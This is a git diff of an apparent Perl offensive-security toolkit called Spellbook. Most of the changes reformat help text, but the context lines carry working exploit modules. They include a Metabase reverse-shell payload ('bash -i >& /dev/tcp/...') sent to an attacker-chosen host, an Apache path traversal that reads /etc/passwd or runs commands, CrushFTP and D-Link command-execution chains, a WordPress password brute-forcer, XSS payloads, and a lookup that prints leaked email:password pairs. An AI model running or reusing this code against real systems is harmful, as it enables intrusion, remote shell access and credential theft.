See this menu + \r-t, --target Define a target\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_41773.pm b/lib/Spellbook/Advisory/CVE_2021_41773.pm index 1fe890a..3bbae0d 100644 --- a/lib/Spellbook/Advisory/CVE_2021_41773.pm +++ b/lib/Spellbook/Advisory/CVE_2021_41773.pm @@ -16,10 +16,10 @@ package Spellbook::Advisory::CVE_2021_41773 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + if (!$file) { $file = "/etc/passwd"; } my $payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/"; @@ -34,7 +34,7 @@ package Spellbook::Advisory::CVE_2021_41773 { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get( - "https://" . $target . $payload, + "https://" . $target . $payload, Content => $command || " " ); @@ -44,16 +44,13 @@ package Spellbook::Advisory::CVE_2021_41773 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2021_41773 -======================= --h, --help See this menu --t, --target Define a target --f, --file Define a file to read --c, --command Arbitrary code execution\n\n"; - -EOT + return " + \rExploit::CVE_2021_41773 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-f, --file Define a file to read + \r-c, --command Arbitrary code execution\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2023_29489.pm b/lib/Spellbook/Advisory/CVE_2023_29489.pm index 59e4b58..8f69a94 100644 --- a/lib/Spellbook/Advisory/CVE_2023_29489.pm +++ b/lib/Spellbook/Advisory/CVE_2023_29489.pm @@ -13,11 +13,11 @@ package Spellbook::Advisory::CVE_2023_29489 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my @payloads = ( @@ -39,17 +39,14 @@ package Spellbook::Advisory::CVE_2023_29489 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2023_29489 -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rExploit::CVE_2023_29489 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } - return 0; + return 0; } } diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm index 966b399..2660ce3 100644 --- a/lib/Spellbook/Advisory/CVE_2023_38646.pm +++ b/lib/Spellbook/Advisory/CVE_2023_38646.pm @@ -23,23 +23,23 @@ package Spellbook::Advisory::CVE_2023_38646 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); - my $initial_request = $userAgent -> get("$target/api/session/properties"); + my $request = $userAgent -> get("$target/api/session/properties"); - if ($initial_request -> code() == 200) { + if ($request -> code() == 200) { try { - my $content = decode_json($initial_request -> content); + my $content = decode_json($request -> content); my $token = $content -> {"setup-token"}; if ($token) { my $headers = HTTP::Headers -> new ("Content-Type" => "application/json"); my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", ""); - my $payload = { + my $payload = qq({ "token": "$token", "details": { "is_on_demand": false, @@ -57,12 +57,10 @@ package Spellbook::Advisory::CVE_2023_38646 { "name": "an-sec-research-team", "engine": "h2" } - }; + }); - my $json_payload = encode_json($payload); - - my $exploit_request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); - my $response = $userAgent -> request($exploit_request); + my $request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); + my $response = $userAgent -> request($request); if ($response -> code() == 400) { push @result, "\n[+] $target exploited\n"; @@ -75,16 +73,13 @@ package Spellbook::Advisory::CVE_2023_38646 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2023_38646 -======================= --h, --help See this menu --t, --target Define a target --r, --remote Set the address to receive the reverse shell --p, --port Set the port of reverse shell\n\n"; - -EOT + return " + \rExploit::CVE_2023_38646 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-r, --remote Set the address to receive the reverse shell + \r-p, --port Set the port of reverse shell\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2024_4040.pm b/lib/Spellbook/Advisory/CVE_2024_4040.pm index c162fe7..336f0e4 100644 --- a/lib/Spellbook/Advisory/CVE_2024_4040.pm +++ b/lib/Spellbook/Advisory/CVE_2024_4040.pm @@ -17,18 +17,18 @@ package Spellbook::Advisory::CVE_2024_4040 { "payload=s" => \$payload, "help" => \$help ); - + if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $endpoint = "$target/WebInterface/"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $cookie_jar = HTTP::Cookies -> new(); - + $userAgent -> cookie_jar($cookie_jar); - + my $response = $userAgent -> post($endpoint); $cookie_jar -> extract_cookies($response); @@ -36,12 +36,12 @@ package Spellbook::Advisory::CVE_2024_4040 { my $cookies = $response -> header("Set-Cookie"); - if ($cookies =~ /currentAuth=([^;]+)/x) { - $response = $userAgent -> post($endpoint, - Content_Type => "application/x-www-form-urlencoded", + if ($cookies =~ /currentAuth=([^;]+)/x) { + $response = $userAgent -> post($endpoint, + Content_Type => "application/x-www-form-urlencoded", Content => "command=exists&paths=<INCLUDE>$payload</INCLUDE>&c2f=$1" ); - + push @result, $response -> decoded_content(); } @@ -49,15 +49,12 @@ package Spellbook::Advisory::CVE_2024_4040 { } if ($help) { - return<<"EOT"; - -Advisory::CVE_2024_4040 -======================================== --h, --help See this menu --u, --target Define the targeted CrushFTP server URL --p, --payload Set the payload to run on the target\n\n"; - -EOT + return " + \rAdvisory::CVE_2024_4040 + \r======================================== + \r-h, --help See this menu + \r-u, --target Define the targeted CrushFTP server URL + \r-p, --payload Set the payload to run on the target\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm index 5d29c85..489c545 100644 --- a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm +++ b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm @@ -15,10 +15,10 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my @uuid = Spellbook::Helper::Generate_UUID -> new(["--version" => 4, "--repeat" => 1]); my $payload = "$target/_ignition/scripts/--%3E%3Csvg%20onload=alert%28$uuid[0]%29%3E"; my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -31,19 +31,16 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ) { push @results, $target; } - + return @results; } if ($help) { - return<<"EOT"; - -Advisory::CVE_ -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rAdvisory::CVE_ + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } return 0; diff --git a/lib/Spellbook/Android/APKSign.pm b/lib/Spellbook/Android/APKSign.pm index 7250745..58745de 100755 --- a/lib/Spellbook/Android/APKSign.pm +++ b/lib/Spellbook/Android/APKSign.pm @@ -21,18 +21,15 @@ package Spellbook::Android::APKSign { } if ($help) { - return<<"EOT"; - -Android::APKSign -================ --h, --help See this menu --a, --apk Pass the APK file --n, --name Set de package name --p, --password Define a password\n"; - -EOT + return " + \rAndroid::APKSign + \r================ + \r-h, --help See this menu + \r-a, --apk Pass the APK file + \r-n, --name Set de package name + \r-p, --password Define a password\n"; } - + return 0; } } diff --git a/lib/Spellbook/Android/Manifest.pm b/lib/Spellbook/Android/Manifest.pm index 57fc37f..065953f 100755 --- a/lib/Spellbook/Android/Manifest.pm +++ b/lib/Spellbook/Android/Manifest.pm @@ -27,27 +27,21 @@ package Spellbook::Android::Manifest { # Exported Android Components # Access to protected intents via exported Activities # Access to sensitive data via exported Activity - - return join("\n", - "[ - ] -> Package name: $package", - "[ - ] -> Debug: $debug", - "[ - ] -> Backup: $backup", - "", - "" - ); + + return " + \r[ - ] -> Package name: $package + \r[ - ] -> Debug: $debug + \r[ - ] -> Backup: $backup\n\n"; } if ($help) { - return<<"EOT"; - -Android::Manifest -============== --h, --help See this menu --f, --file Pass the AndroidManifest.xml file\n\n"; - -EOT + return " + \rAndroid::Manifest + \r============== + \r-h, --help See this menu + \r-f, --file Pass the AndroidManifest.xml file\n\n"; } - + return 0; } } diff --git a/lib/Spellbook/Android/Strings.pm b/lib/Spellbook/Android/Strings.pm index 79cf20d..3bb0b51 100755 --- a/lib/Spellbook/Android/Strings.pm +++ b/lib/Spellbook/Android/Strings.pm @@ -12,20 +12,17 @@ package Spellbook::Android::Strings { # resources.arsc/strings.xml # res/xml/file_paths.xml - + # if (Dumper($data) =~ m/:\/\//) { # return "true"; # } } if ($help) { - return<<"EOT"; - -Android:: -================ --h, --help See this menu\n"; - -EOT + return " + \rAndroid:: + \r================ + \r-h, --help See this menu\n"; } return 0; diff --git a/lib/Spellbook/Bruteforce/Facebook.pm b/lib/Spellbook/Bruteforce/Facebook.pm index 004034b..7f291ef 100644 --- a/lib/Spellbook/Bruteforce/Facebook.pm +++ b/lib/Spellbook/Bruteforce/Facebook.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Facebook { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,14 +18,11 @@ package Spellbook::Bruteforce::Facebook { } if ($help) { - return<<"EOT"; - -Bruteforce::Facebook -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rBruteforce::Facebook + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } } } diff --git a/lib/Spellbook/Bruteforce/Instagram.pm b/lib/Spellbook/Bruteforce/Instagram.pm index 7f99fe3..d1d5022 100644 --- a/lib/Spellbook/Bruteforce/Instagram.pm +++ b/lib/Spellbook/Bruteforce/Instagram.pm @@ -18,18 +18,15 @@ package Spellbook::Bruteforce::Instagram { if ($username) { my $useragent = LWP::UserAgent -> new(); - } + } if ($help) { - return<<"EOT"; - -Exploit::Brute_Force_Instagram -======================= --h, --help See this menu --u, --username Define a username --f, --file Define a file to read\n\n"; - -EOT + return " + \rExploit::Brute_Force_Instagram + \r======================= + \r-h, --help See this menu + \r-u, --username Define a username + \r-f, --file Define a file to read\n\n"; } return 0; diff --git a/lib/Spellbook/Bruteforce/LinkedIn.pm b/lib/Spellbook/Bruteforce/Linkedin.pm similarity index 68% rename from lib/Spellbook/Bruteforce/LinkedIn.pm rename to lib/Spellbook/Bruteforce/Linkedin.pm index 8b6a8e7..d59352d 100644 --- a/lib/Spellbook/Bruteforce/LinkedIn.pm +++ b/lib/Spellbook/Bruteforce/Linkedin.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::LinkedIn { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,14 +18,11 @@ package Spellbook::Bruteforce::LinkedIn { } if ($help) { - return<<"EOT"; - -Bruteforce::LinkedIn -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rBruteforce::LinkedIn + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } } } diff --git a/lib/Spellbook/Bruteforce/SMTP.pm b/lib/Spellbook/Bruteforce/SMTP.pm index d976736..727b096 100644 --- a/lib/Spellbook/Bruteforce/SMTP.pm +++ b/lib/Spellbook/Bruteforce/SMTP.pm @@ -18,14 +18,11 @@ package Spellbook::Bruteforce::SMTP { } if ($help) { - return<<"EOT"; - -Bruteforce::SMTP -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rBruteforce::SMTP + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } } } diff --git a/lib/Spellbook/Bruteforce/Twitter.pm b/lib/Spellbook/Bruteforce/Twitter.pm index cd1b3ed..d094ea4 100644 --- a/lib/Spellbook/Bruteforce/Twitter.pm +++ b/lib/Spellbook/Bruteforce/Twitter.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Twitter { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,14 +18,11 @@ package Spellbook::Bruteforce::Twitter { } if ($help) { - return<<"EOT"; - -Bruteforce::Twitter -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rBruteforce::Twitter + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } } } diff --git a/lib/Spellbook/Bruteforce/Wordpress.pm b/lib/Spellbook/Bruteforce/Wordpress.pm index f19689e..b204b07 100644 --- a/lib/Spellbook/Bruteforce/Wordpress.pm +++ b/lib/Spellbook/Bruteforce/Wordpress.pm @@ -3,7 +3,6 @@ package Spellbook::Bruteforce::Wordpress { use warnings; use LWP::UserAgent; use HTTP::Request::Common; - use Carp qw(croak); # THIS IS A DRAFT MODULE @@ -19,32 +18,28 @@ package Spellbook::Bruteforce::Wordpress { ); if ($target) { - open(my $wordlist, "<", "./files/rockyou.txt") - or croak "Could not open wordlist file: $!"; - my @passwords = <$wordlist>; - close($wordlist) or croak "Could not close wordlist file: $!"; + open(my $wordlist, "<", "./files/rockyou.txt"); - chomp(@passwords); + while (<$wordlist>) { + chomp ($_); - foreach my $password (@passwords) { my $useragent = LWP::UserAgent->new; my $response = $useragent -> request(POST $target, [ log => $username, - pwd => $password, + pwd => $_, ]); if ($response -> is_success) { - print "Successfully logged in with password: $password \n"; - last; + print "Successfully logged in with password: $_ \n"; } } + + close($wordlist); } if ($help) { - return<<"EOT"; - -EOT + return ""; } return 0; diff --git a/lib/Spellbook/Core/Credentials.pm b/lib/Spellbook/Core/Credentials.pm index 309d19f..f12d6e8 100644 --- a/lib/Spellbook/Core/Credentials.pm +++ b/lib/Spellbook/Core/Credentials.pm @@ -15,14 +15,14 @@ package Spellbook::Core::Credentials { "p|platform=s" => \$platform, "v|value=s" => \$value, ); - + if ($platform) { my $credentials = Mojo::File -> new(".config/credentials.json"); my $data = $credentials -> slurp(); my $content = decode_json($data); - if ($value) { + if ($value) { $content -> {$platform} = $value; $credentials -> spurt(encode_json($content)); } @@ -31,17 +31,14 @@ package Spellbook::Core::Credentials { } if ($help) { - return<<"EOT"; - -Core::Credentials -============== --h, --help See this menu --p, --platform Read some credentials filtering by platform --v, --value Define a value of a platform\n\n"; - -EOT + return " + \rCore::Credentials + \r============== + \r-h, --help See this menu + \r-p, --platform Read some credentials filtering by platform + \r-v, --value Define a value of a platform\n\n"; } - + return 0; } } diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index e77fe88..f50f568 100644 --- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -3,18 +3,17 @@ package Spellbook::Core::Helper { use warnings; sub new { - return<<"EOT"; - -Spellbook v0.3.6 -Core Commands -============== -Command Description -------- ----------- --s, --search List modules, you can filter by category --m, --module Define a module to use --h, --help To see help menu of a module\n\n"; - -EOT + print " + \rSpellbook v0.3.6 + \rCore Commands + \r============== + \r\tCommand Description + \r\t------- ----------- + \r\t-s, --search List modules, you can filter by category + \r\t-m, --module Define a module to use + \r\t-h, --help To see help menu of a module\n\n"; + + return 1; } } diff --git a/lib/Spellbook/Core/Module.pm b/lib/Spellbook/Core/Module.pm index 82b3a7f..cb54b7e 100644 --- a/lib/Spellbook/Core/Module.pm +++ b/lib/Spellbook/Core/Module.pm @@ -2,31 +2,20 @@ package Spellbook::Core::Module { use strict; use warnings; use Spellbook::Core::Resources; - use Carp qw(croak); sub new { my ($self, $module, @parameters) = @_; - my $resources = Spellbook::Core::Resources->new(); + my $resources = Spellbook::Core::Resources -> new(); - foreach my $package (@{$resources->{modules}}) { - my $category = ucfirst $package->{category}; - my $name = $category . "::" . $package->{module}; + foreach my $package (@{$resources -> {modules}}) { + my $category = ucfirst $package -> {category}; + my $name = $category . "::" . $package -> {module}; - if ($name eq $module) { - my $module_path = "Spellbook::" . $category . "::" . $package->{module}; + if ($name eq $module) { + require "Spellbook/" . $category . "/" . $package -> {module} . ".pm"; - my $success = eval { - require Module::Load; - Module::Load::load($module_path); - 1; - }; - - if (!$success || $@) { - croak "Failed to load module $module_path: $@"; - } - - my @run = $module_path->new(@parameters); + my @run = "Spellbook::$name" -> new(@parameters); my @results; foreach my $result (@run) { @@ -38,7 +27,7 @@ package Spellbook::Core::Module { return @results; } } - + return "\n[!] Module not found.\n\n"; } } diff --git a/lib/Spellbook/Core/Orchestrator.pm b/lib/Spellbook/Core/Orchestrator.pm index 0c1c112..b4a8a63 100644 --- a/lib/Spellbook/Core/Orchestrator.pm +++ b/lib/Spellbook/Core/Orchestrator.pm @@ -7,13 +7,13 @@ package Spellbook::Core::Orchestrator { use threads::shared; use Spellbook::Helper::Read_File; use List::MoreUtils qw(uniq); - + sub new { my ($self, $parameters) = @_; my ($help, $wordlist, $module, $list, $queue); my $threads = 10; - + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, @@ -34,24 +34,24 @@ package Spellbook::Core::Orchestrator { $queue -> end(); my @results :shared; - + async { while (defined(my $target = $queue -> dequeue())) { my @response = Spellbook::Core::Module -> new ( $module, [ "--target" => $target, @$parameters ] ); - + lock(@results); - + if (@response) { push @results, @response; } } - } - + } + for 1 .. $threads; - while (threads -> list(threads::running) > 0) { + while (threads -> list(threads::running) > 0) { $_ -> join() for threads -> list(threads::all); } @@ -59,16 +59,13 @@ package Spellbook::Core::Orchestrator { } if ($help) { - return<<"EOT"; - -Core::Orchestrator -============== --h, --help See this menu --t, --threads Number of threads --w, --wordlist Wordlist file --e, --entrypoint Module to execute\n\n"; - -EOT + return " + \rCore::Orchestrator + \r============== + \r\t-h, --help See this menu + \r\t-t, --threads Number of threads + \r\t-w, --wordlist Wordlist file + \r\t-e, --entrypoint Module to execute\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/CORS_Misconfig.pm b/lib/Spellbook/Exploit/CORS_Misconfig.pm index 7dd342c..72fb36c 100644 --- a/lib/Spellbook/Exploit/CORS_Misconfig.pm +++ b/lib/Spellbook/Exploit/CORS_Misconfig.pm @@ -14,17 +14,17 @@ package Spellbook::Exploit::CORS_Misconfig { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $useragent = Spellbook::Core::UserAgent -> new (); my @payloads = ("*", "null", "https://spellbook.xpl", "$target.spellbook.xpl"); # "test.$target", "http://" foreach my $payload (@payloads) { my $request = $useragent -> get($target, "Origin" => $payload); my $header = $request -> header("access-control-allow-origin"); - + if ($header) { if ($header eq $payload) { push @results, $target; @@ -36,14 +36,11 @@ package Spellbook::Exploit::CORS_Misconfig { } if ($help) { - return<<"EOT"; - -Exploit::CORS_Misconfing -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rExploit::CORS_Misconfing + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/DataBreach.pm b/lib/Spellbook/Exploit/DataBreach.pm index e68d700..c500fad 100644 --- a/lib/Spellbook/Exploit/DataBreach.pm +++ b/lib/Spellbook/Exploit/DataBreach.pm @@ -4,7 +4,7 @@ package Spellbook::Exploit::DataBreach { use JSON; use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -20,7 +20,7 @@ package Spellbook::Exploit::DataBreach { my $endpoint = "https://haveibeenpwned.com/api/v3/breachedaccount/$target?includeUnverified=true&truncateResponse=false"; my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get($endpoint, "hibp-api-key" => $credentials); - + if ($request -> code() == 200) { my $data = decode_json($request -> decoded_content()); @@ -36,14 +36,11 @@ package Spellbook::Exploit::DataBreach { } if ($help) { - return<<"EOT"; - -Exploit::Databreach -============== --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rExploit::Databreach + \r============== + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } } } diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm index 9102e89..2949057 100755 --- a/lib/Spellbook/Exploit/Django_DEBUG.pm +++ b/lib/Spellbook/Exploit/Django_DEBUG.pm @@ -1,4 +1,4 @@ -package Spellbook::Exploit::Django_DEBUG { +package Spellbook::Exploit::Django_Debug { use strict; use warnings; use Spellbook::Core::UserAgent; @@ -15,7 +15,7 @@ package Spellbook::Exploit::Django_DEBUG { ); if ($target){ - if ($target !~ /^http(?:s)?:\/\//x){ + if ($target !~ /^http(s)?:\/\//){ $target = "https://$target"; } @@ -32,19 +32,16 @@ package Spellbook::Exploit::Django_DEBUG { } } } - + return @results } if ($help) { - return<<"EOT"; - -Exploit::Django_Debug -======================= --h, --help See this menu --t, --target Define a target"; - -EOT + return " + \rExploit::Django_Debug + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target"; } return 0; diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm index f2d49a5..e7d8540 100644 --- a/lib/Spellbook/Exploit/Fullchain_DLINK.pm +++ b/lib/Spellbook/Exploit/Fullchain_DLINK.pm @@ -7,7 +7,7 @@ package Spellbook::Exploit::Fullchain_DLINK { use Spellbook::Recon::Query_Shodan; use Spellbook::Advisory::CVE_2020_9376; use Spellbook::Advisory::CVE_2020_9377; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $payload, @results); @@ -20,23 +20,23 @@ package Spellbook::Exploit::Fullchain_DLINK { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]); if ($credentials) { - my ($username, $password) = split /:/x, $credentials; + my ($username, $password) = split /:/, $credentials; - if (!$password) { + if (!$password) { $password = "admin"; } if ($username) { my $userAgent = LWP::UserAgent->new(); - my $login_payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; - + my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; + my $headers = HTTP::Headers->new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=zwUEueUOvi", @@ -48,16 +48,16 @@ package Spellbook::Exploit::Fullchain_DLINK { "Connection" => "keep-alive" ); - my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $login_payload); + my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload); my $response = $userAgent -> request($request); - - if ($response -> is_success) { + + if ($response -> is_success) { my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ "--target" => $target, "--cookie" => "zwUEueUOvi", "--payload" => "uname -a" ]); - + if ($exploit[0] ne "Authenication fail") { push @results, @exploit; } @@ -69,15 +69,12 @@ package Spellbook::Exploit::Fullchain_DLINK { } if ($help) { - return<<"EOT"; - -Exploit::Fullchain_DLINK -======================= --h, --help See this menu --t, --target Define a target --p, --payload Send a command\n\n"; - -EOT + return " + \rExploit::Fullchain_DLINK + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-p, --payload Send a command\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/HAProxy_Exposed.pm b/lib/Spellbook/Exploit/HAProxy_Exposed.pm index 1ccdb33..b40ca6c 100644 --- a/lib/Spellbook/Exploit/HAProxy_Exposed.pm +++ b/lib/Spellbook/Exploit/HAProxy_Exposed.pm @@ -1,7 +1,7 @@ package Spellbook::Exploit::HAProxy_Exposed { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,17 +14,14 @@ package Spellbook::Exploit::HAProxy_Exposed { if ($target) { return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::HAProxy_Exposed -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rExploit::HAProxy_Exposed + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Headers_Misconfig.pm b/lib/Spellbook/Exploit/Headers_Misconfig.pm index 168352c..fa75e01 100644 --- a/lib/Spellbook/Exploit/Headers_Misconfig.pm +++ b/lib/Spellbook/Exploit/Headers_Misconfig.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Headers_Misconfig { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -35,19 +35,16 @@ package Spellbook::Exploit::Headers_Misconfig { push @results, "$target don't have $header header."; } } - + return @results; } if ($help) { - return<<"EOT"; - -Exploit::Headers_Misconfig -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rExploit::Headers_Misconfig + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Mixed_Content.pm b/lib/Spellbook/Exploit/Mixed_Content.pm index 211bfbc..c54967a 100644 --- a/lib/Spellbook/Exploit/Mixed_Content.pm +++ b/lib/Spellbook/Exploit/Mixed_Content.pm @@ -2,7 +2,7 @@ package Spellbook::Exploit::Mixed_Content { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result, @urls); @@ -15,18 +15,18 @@ package Spellbook::Exploit::Mixed_Content { if ($target) { if ($target =~ /^http:\/\//x) { - $target =~ s/^http:\/\///x; + $target =~ s/^http:\/\///x; } - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new (); my $request = $userAgent -> get($target); for (($request -> content =~ /src="([^"]+)"/gx) || ($request -> content =~ /href="([^"]+)"/gx)){ - push @urls, $1; + push @urls, $1; } foreach my $url (@urls) { @@ -36,17 +36,15 @@ package Spellbook::Exploit::Mixed_Content { } return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::Mixed_Content -===================== --h, --help See this menu --t, --target Define a target to perform the analysis\n; - -EOT + return " + \rExploit::Mixed_Content + \r===================== + \r-h, --help See this menu + \r-t, --target Define a target to perform the analysis\n + "; } return 0; diff --git a/lib/Spellbook/Exploit/None_Attack.pm b/lib/Spellbook/Exploit/None_Attack.pm index 4ae6efe..dfc794b 100644 --- a/lib/Spellbook/Exploit/None_Attack.pm +++ b/lib/Spellbook/Exploit/None_Attack.pm @@ -1,8 +1,8 @@ package Spellbook::Exploit::None_Attack { use strict; use warnings; - - sub new { + + sub new { my ($self, $parameters) = @_; my ($help, @result); @@ -13,16 +13,13 @@ package Spellbook::Exploit::None_Attack { if (1) { return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::None_Attack -===================== --h, --help See this menu\n\n"; - -EOT + return " + \rExploit::None_Attack + \r===================== + \r-h, --help See this menu\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Pwn_DB.pm b/lib/Spellbook/Exploit/Pwn_DB.pm index 64fa9a8..a3a976b 100644 --- a/lib/Spellbook/Exploit/Pwn_DB.pm +++ b/lib/Spellbook/Exploit/Pwn_DB.pm @@ -17,7 +17,7 @@ package Spellbook::Exploit::Pwn_DB { if ($target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> post( - "https://pwndb2am4tzkvold.tor2web.io/", + "https://pwndb2am4tzkvold.tor2web.io/", Content => "luser=&domain=$target&luseropr=0&domainopr=0&submitform=em" ); @@ -29,21 +29,19 @@ package Spellbook::Exploit::Pwn_DB { while ($content =~ /\[luser\] => ([^\n]+)[^\)]+\[password\] => ([^\n]+)/mgx) { if ($1 ne "donate") { print "$1\@$target:$2\n"; - } + } } - } + } } } - + if ($help) { - return<<"EOT"; - -Exploit::Pwn_DB -======================= --h, --help See this menu --t, --target Define a target\n; - -EOT + return " + \rExploit::Pwn_DB + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n + "; } return 0; diff --git a/lib/Spellbook/Exploit/Redis_Unauth.pm b/lib/Spellbook/Exploit/Redis_Unauth.pm index a055494..afb0625 100644 --- a/lib/Spellbook/Exploit/Redis_Unauth.pm +++ b/lib/Spellbook/Exploit/Redis_Unauth.pm @@ -3,7 +3,7 @@ package Spellbook::Exploit::Redis_Unauth { use warnings; use Redis; use Try::Tiny; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -21,30 +21,27 @@ package Spellbook::Exploit::Redis_Unauth { try { my $redis = Redis -> new ( - server => $target, + server => $target, name => "Spellbook", cnx_timeout => 45 ); - + my $requirepass = $redis -> config_get ("requirepass") -> [1]; - + if (!defined($requirepass) || $requirepass eq "") { push @result, $target; } }; return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::Redis_Exposed -===================== --h, --help See this menu --t, --target Set a target to detect misconfigurations\n\n"; - -EOT + return " + \rExploit::Redis_Exposed + \r===================== + \r-h, --help See this menu + \r-t, --target Set a target to detect misconfigurations\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Reflected_XSS.pm b/lib/Spellbook/Exploit/Reflected_XSS.pm index 2e66736..59beaad 100644 --- a/lib/Spellbook/Exploit/Reflected_XSS.pm +++ b/lib/Spellbook/Exploit/Reflected_XSS.pm @@ -31,7 +31,7 @@ package Spellbook::Exploit::Reflected_XSS { $params -> remove($name); $params -> append($name, $payload); - + $parsed_url -> query($params); try { @@ -47,19 +47,16 @@ package Spellbook::Exploit::Reflected_XSS { } } } - + return @result; } if ($help) { - return<<"EOT"; - 